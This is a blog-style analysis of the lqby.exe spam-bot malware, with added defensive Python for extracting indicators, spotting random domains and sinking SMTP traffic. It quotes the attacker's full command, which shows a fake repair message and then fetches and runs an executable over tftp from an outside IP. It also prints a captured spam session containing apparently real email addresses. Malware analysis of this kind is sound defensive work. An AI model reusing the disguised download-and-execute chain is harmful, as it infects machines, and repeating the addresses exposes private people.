endellion.me.uk

lqby.exe: A Spam Server Virus

The VNC authentication flaw results in the following command being issued to Server:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 12.206.65.226 GET lqby.exe & start lqby&

First off, who from? WHOIS queries answer that.

The infector (whois 24.116.21.86) is a cableone.net address; its DNS host is not approachable at this moment. The virus server, however, is not the same computer. This could possibly indicate that the botnet herders have (at least) dealings with Mediacom Communications in terms of hosting and bandwidth provision. Just a thought. Whois 12.206.65.226:

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC (NET-12-206-64-0-1)
12.206.64.0 - 12.206.127.255

The "tftp -i ... GET" fetches a program called lqby.exe from 12.206.65.226 in binary (octet) mode, and "start lqby" then executes it under the same name; the two echo lines exist only to make the console look like a repair in progress.
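As an added example (not code from the original page), here is a small parser that pulls the indicators out of that command line: the TFTP server, the file it drops, whether binary mode was requested, the decoy text shown on the console, and the name handed to start. The regexes follow the documented syntax of the Windows tftp and start commands; the DropperIOCs layout and the function names are my own, and the "&" splitting is deliberately naive (it ignores quoting and ^ escapes), which is enough for this sample.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# The command as captured on the page, verbatim.
CAPTURED_COMMAND = (
    "%comspec% /c echo Repairing user32.dll & echo Please wait... "
    "& tftp -i 12.206.65.226 GET lqby.exe & start lqby&"
)

# Windows tftp.exe syntax: tftp [-i] host [GET | PUT] source [destination]
TFTP_RE = re.compile(
    r"^tftp\s+(?P<opts>(?:-\w\s+)*)(?P<host>\S+)\s+(?P<verb>get|put)\s+"
    r"(?P<src>\S+)(?:\s+(?P<dst>\S+))?$",
    re.IGNORECASE,
)
# cmd.exe 'start': optional /switches, then the program to launch
START_RE = re.compile(r"^start\s+(?:/\w+\s+)*(?P<target>\S+)", re.IGNORECASE)
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*)$", re.IGNORECASE)


@dataclass
class DropperIOCs:
    decoy_text: list[str] = field(default_factory=list)  # what the console shows
    download_host: Optional[str] = None                  # TFTP server (IP or name)
    download_file: Optional[str] = None                  # name the payload lands under
    binary_mode: bool = False                            # tftp -i (octet mode) present
    launched: Optional[str] = None                       # argument handed to 'start'


def split_chain(cmd: str) -> list[str]:
    """Split a cmd.exe line on '&' (unconditional chaining) into commands.

    The '%comspec% /c' wrapper is stripped first and empty segments, such as
    the one produced by the trailing '&', are dropped. Naive on purpose: quoted
    ampersands and ^ escapes are not honoured.
    """
    body = re.sub(r"^\s*%comspec%\s+/c\s+", "", cmd, flags=re.IGNORECASE)
    return [seg.strip() for seg in body.split("&") if seg.strip()]


def extract_iocs(cmd: str) -> DropperIOCs:
    """Classify each chained command and collect the network/file indicators."""
    iocs = DropperIOCs()
    for seg in split_chain(cmd):
        if m := ECHO_RE.match(seg):
            iocs.decoy_text.append(m.group("text").strip())
        elif m := TFTP_RE.match(seg):
            iocs.download_host = m.group("host")
            # tftp stores the file under the destination name when one is given,
            # otherwise under the source name.
            iocs.download_file = m.group("dst") or m.group("src")
            iocs.binary_mode = "-i" in m.group("opts").split()
        elif m := START_RE.match(seg):
            iocs.launched = m.group("target")
    return iocs


def indicator_lines(iocs: DropperIOCs) -> list[str]:
    """Flatten the result into 'type=value' lines for a blocklist or report."""
    out = []
    if iocs.download_host:
        out.append(f"ip={iocs.download_host}")
    if iocs.download_file:
        out.append(f"file={iocs.download_file}")
    if iocs.launched:
        out.append(f"process={iocs.launched}")
    return out


if __name__ == "__main__":
    found = extract_iocs(CAPTURED_COMMAND)
    print(found)
    print("\n".join(indicator_lines(found)))
```

Fed the captured line it yields ip=12.206.65.226, file=lqby.exe and process=lqby, which is exactly what goes into a firewall block and an endpoint hunt while the rest of the analysis continues.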

Once running, lqby.exe starts with some DNS lookups:

DNS Standard query A ypfqvazdls.qgcuyxdjqzwizgnkuhvt.com

DNS Standard query A ypfqvazdls.kangozip.com

Wow, these people go in for amazing keystroke combinations, not unlike what happened on my computer when the cats were kittens and they used to sleep on the laptop's keyboard, no doubt because it was nice and warm... And one day they even managed to take a screenshot, which is how I know how much garble they typed into Notepad. I think I still have that screenshot somewhere. But that's off-topic.

Not entirely surprisingly, kangozip.com is from China. There is, however, no whois match for the domain "QGCUYXDJQZWIZGNKUHVT.COM". Not sure what that is all about; I've seen these queries for garble.domain before. Perhaps it invokes something somewhere anyway?

The kangozip query does get an answer, though: DNS Standard query response A 216.215.242.54
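The random look of those labels is something you can score rather than eyeball. The following is an added example, not code from the original page: a cheap heuristic over each DNS label (length, vowel ratio, longest consonant run, character entropy) applied to the two names above plus a couple of ordinary hostnames picked for comparison. The thresholds are my own and this is a heuristic, not a classifier: it will flag long acronyms and it will miss short pronounceable labels such as kangozip, which is why it reports the features and not only a verdict.

```python
from __future__ import annotations

import math
from dataclasses import dataclass

VOWELS = set("aeiou")


@dataclass(frozen=True)
class LabelFeatures:
    label: str
    length: int
    vowel_ratio: float        # vowels / letters (0 when there are no letters)
    max_consonant_run: int    # longest run of consecutive consonants ('y' counts)
    entropy: float            # Shannon entropy of the characters, in bits


def label_features(label: str) -> LabelFeatures:
    """Compute the per-label features the heuristic looks at."""
    label = label.lower()
    letters = [c for c in label if c.isalpha()]
    vowels = sum(1 for c in letters if c in VOWELS)
    run = longest = 0
    for c in label:
        if c.isalpha() and c not in VOWELS:
            run += 1
            longest = max(longest, run)
        else:
            run = 0           # a vowel, digit or hyphen breaks the run
    counts = {c: label.count(c) for c in set(label)}
    entropy = -sum(n / len(label) * math.log2(n / len(label))
                   for n in counts.values()) if label else 0.0
    ratio = vowels / len(letters) if letters else 0.0
    return LabelFeatures(label, len(label), ratio, longest, entropy)


def looks_random(f: LabelFeatures, min_len: int = 8,
                 max_vowel_ratio: float = 0.2, min_consonant_run: int = 5) -> bool:
    """Thresholds are my own. Short labels are never flagged: TLDs and most
    real host names are short, and the cost of a miss there is low."""
    return f.length >= min_len and (
        f.vowel_ratio < max_vowel_ratio or f.max_consonant_run >= min_consonant_run)


def suspicious_labels(hostname: str) -> list[str]:
    """Return the labels of a hostname that trip the heuristic, in order."""
    return [f.label for f in map(label_features, hostname.split("."))
            if looks_random(f)]


# Constructed sample: the two names from the capture plus benign comparison names.
SAMPLE_HOSTNAMES = [
    "ypfqvazdls.qgcuyxdjqzwizgnkuhvt.com",
    "ypfqvazdls.kangozip.com",
    "mta141.mail.ukl.yahoo.com",
    "www.example.com",
]

if __name__ == "__main__":
    for host in SAMPLE_HOSTNAMES:
        for f in map(label_features, host.split(".")):
            flag = "RANDOM?" if looks_random(f) else ""
            print(f"{host:40} {f.label:22} len={f.length:2} vr={f.vowel_ratio:.2f} "
                  f"run={f.max_consonant_run} H={f.entropy:.2f} {flag}")
```

On the sample set it flags ypfqvazdls and qgcuyxdjqzwizgnkuhvt and nothing else; in a sandbox, running every queried name through suspicious_labels is a quick way to separate the garble lookups from the real rendezvous domain.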

As soon as the cableone customer has dumped their dirty payload, lqby.exe begins to listen on UDP port 28356 and also on TCP port 2044. And no sooner does the listening start than a connection is made too, from 67.159.44.52, which doesn't seem to resolve to a name.

Either the infector has informed 67.159.44.52 of the successful infection of Server, or else the DNS lookups somehow triggered that. Either way, 67.159.44.52 now tells Server what to do, word for word.

For the sake of "research" I have to be bad and let some packets out. (No, actually, lazy. The last time I tried this one I set up VMs with the IP addresses of all the major mail providers, such as Yahoo and AOL and all that. But that was a lot of work.)

220 mta141.mail.ukl.yahoo.com ESMTP YSmtp service ready
HELO key1m53
250 mta141.mail.ukl.yahoo.com
MAIL FROM: <heribertocharlesdk@jamaicacoffeeshop.com.pt>
250 sender <heribertocharlesdk@jamaicacoffeeshop.com.pt> ok
RCPT TO: <lucymona@yahoo.co.uk>
250 recipient <lucymona@yahoo.co.uk> ok
RCPT TO: <andybfreeman@yahoo.co.uk>
250 recipient <andybfreeman@yahoo.co.uk> ok
RCPT TO: <lanaike@yahoo.co.uk>
250 recipient <lanaike@yahoo.co.uk> ok
DATA
354 go ahead
Message-ID: <000701c7764c$f3079160$439f2c34@jamaicacoffeeshop.com.pt>
Reply-To: "Heriberto Charles" <heribertocharlesdk@jamaicacoffeeshop.com.pt>
From: "Heriberto Charles" <heribertocharlesdk@jamaicacoffeeshop.com.pt>
To: <lucymona@yahoo.co.uk>,
    <andybfreeman@yahoo.co.uk>,
    <lanaike@yahoo.co.uk>
Subject: Cialas and Viagra are GREAT!!
Date: Tue, 03 Apr 2007 20:05:27 -0400
MIME-Version: 1.0
Content-Type: text/plain;
    format=flowed;
    charset="windows-1250";
    reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2869
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
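The VMs impersonating the big mail providers mentioned above can be replaced by something much cheaper: a sink that answers every SMTP command with a success code, records the envelope and headers and relays nothing. Here is one, added as an example and not code from the original page, replayed against the client side of the session captured above. The capture stops at the headers, so the blank line, the dot-stuffed body line, the terminating "." and QUIT are constructed, and the hostname sink.example is made up. To take real connections, wrap feed_line in a socketserver.StreamRequestHandler that writes the greeting first and every non-None reply back, and point the sandbox's port 25 at it.

```python
from __future__ import annotations

import re
from typing import Optional

ADDR_RE = re.compile(r"<([^>]*)>")   # address inside MAIL FROM: / RCPT TO:


def parse_headers(lines: list[str]) -> tuple[dict, str]:
    """Split DATA lines into a header dict and the body, unfolding folded headers."""
    headers: dict[str, str] = {}
    last, end = None, len(lines)
    for i, line in enumerate(lines):
        if line == "":                  # blank line ends the header block
            end = i
            break
        if line[0] in " \t" and last:   # continuation of the previous header
            headers[last] += " " + line.strip()
        else:
            name, _, value = line.partition(":")
            last = name.strip()
            headers[last] = value.strip()
    return headers, "\n".join(lines[end + 1:])


def _address(arg: str) -> str:
    """'FROM: <a@b>' -> 'a@b'; tolerates bots that omit the angle brackets."""
    m = ADDR_RE.search(arg)
    return m.group(1) if m else arg.split(":", 1)[-1].strip()


class SmtpSink:
    """Feed one client line, get the reply (None inside DATA). Everything is
    answered 250 so the bot proceeds to DATA; messages are kept, never relayed."""

    def __init__(self, hostname: str = "sink.example") -> None:   # hostname is made up
        self.hostname = hostname
        self.greeting = f"220 {hostname} ESMTP sink ready"
        self.messages: list[dict] = []
        self.helo: Optional[str] = None
        self.mail_from: Optional[str] = None
        self.rcpt_to: list[str] = []
        self._in_data, self._data = False, []

    def feed_line(self, line: str) -> Optional[str]:
        line = line.rstrip("\r\n")
        if self._in_data:
            if line == ".":             # lone dot terminates DATA
                self._in_data = False
                headers, body = parse_headers(self._data)
                self.messages.append({"helo": self.helo, "mail_from": self.mail_from,
                                      "rcpt_to": self.rcpt_to, "headers": headers,
                                      "body": body})
                self.mail_from, self.rcpt_to = None, []
                return f"250 ok: queued as sink-{len(self.messages)}"
            # RFC 5321 dot-stuffing: the client doubled a leading '.', undo it
            self._data.append(line[1:] if line.startswith(".") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            return f"250 {self.hostname}"
        if verb == "MAIL":
            self.mail_from = _address(arg)
            return f"250 sender <{self.mail_from}> ok"
        if verb == "RCPT":
            self.rcpt_to.append(_address(arg))
            return f"250 recipient <{self.rcpt_to[-1]}> ok"
        if verb == "DATA":
            if not self.rcpt_to:        # DATA without a recipient is a sequence error
                return "503 need RCPT first"
            self._in_data, self._data = True, []
            return "354 go ahead"
        if verb == "QUIT":
            return f"221 {self.hostname} closing"
        return "502 command not implemented"


def replay(sink: SmtpSink, client_lines: list[str]) -> list[str]:
    """Drive a sink with captured client lines and return every reply it gives."""
    replies = [sink.greeting]
    for line in client_lines:
        reply = sink.feed_line(line)
        if reply is not None:
            replies.append(reply)
    return replies


# Client side of the session captured above; the last four lines are constructed.
CAPTURED_SESSION = [
    "HELO key1m53",
    "MAIL FROM: <heribertocharlesdk@jamaicacoffeeshop.com.pt>",
    "RCPT TO: <lucymona@yahoo.co.uk>",
    "RCPT TO: <andybfreeman@yahoo.co.uk>",
    "RCPT TO: <lanaike@yahoo.co.uk>",
    "DATA",
    'From: "Heriberto Charles" <heribertocharlesdk@jamaicacoffeeshop.com.pt>',
    "To: <lucymona@yahoo.co.uk>,",
    "    <andybfreeman@yahoo.co.uk>,",
    "    <lanaike@yahoo.co.uk>",
    "Subject: Cialas and Viagra are GREAT!!",
    "",
    "..constructed body line that began with a dot",
    ".",
    "QUIT",
]

if __name__ == "__main__":
    sink = SmtpSink()
    print("\n".join(replay(sink, CAPTURED_SESSION)))
    print(sink.messages[0]["mail_from"], "->", sink.messages[0]["rcpt_to"])
```

Replayed, the sink produces the same shape of dialogue the Yahoo MTA did above (250 for HELO, sender and each recipient, 354 for DATA, 250 after the dot) and ends up holding one message with the HELO name key1m53, the forged sender, the three yahoo.co.uk recipients and the unfolded To header; the folded To lines and the dot-stuffed body line are the two spots where a hand-rolled sink usually goes wrong, and the 503 on DATA-before-RCPT stops a sloppy bot from wedging it.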